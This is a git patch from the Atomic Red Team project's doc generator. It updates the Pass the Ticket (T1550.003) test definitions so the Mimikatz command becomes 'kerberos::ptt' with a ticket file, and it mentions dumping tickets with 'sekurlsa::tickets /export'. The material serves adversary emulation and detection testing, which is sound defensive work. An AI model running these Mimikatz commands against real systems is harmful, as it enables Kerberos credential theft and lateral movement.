From d1789b5bfcfaf4baa3d2419167a93b6db20895aa Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 8 Dec 2021 16:57:20 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 30 ++++++++++++++---------------- atomics/T1550.003/T1550.003.md | 2 +- 2 files changed, 15 insertions(+), 17 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4f4331d9..9c54f222 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -32872,14 +32872,11 @@ defense-evasion: supported_platforms: - windows input_arguments: - user_name: - description: username + ticket: + description: Ticket file name usually format of 'id-username\@domain.kirbi' + (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: Administrator - domain: - description: domain - type: String - default: atomic.local + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -32900,7 +32897,9 @@ defense-evasion: New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force executor: - command: "#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}\n" + command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" + +' name: command_prompt T1556.002: technique: @@ -66071,14 +66070,11 @@ lateral-movement: supported_platforms: - windows input_arguments: - user_name: - description: username + ticket: + description: Ticket file name usually format of 'id-username\@domain.kirbi' + (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: Administrator - domain: - description: domain - type: String - default: atomic.local + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -66099,7 +66095,9 @@ lateral-movement: New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force executor: - command: "#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}\n" + command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" + +' name: command_prompt T1563.002: technique: diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md index 58f8698b..0084eaf4 100644 --- a/atomics/T1550.003/T1550.003.md +++ b/atomics/T1550.003/T1550.003.md @@ -32,7 +32,7 @@ Similar to PTH, but attacking Kerberos #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| ticket | Ticket file name usually format of 'id-username\@domain\.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) | String | | +| ticket | Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) | String | | | mimikatz_exe | Path of the Mimikatz binary | Path | PathToAtomicsFolder\T1550.003\bin\mimikatz.exe|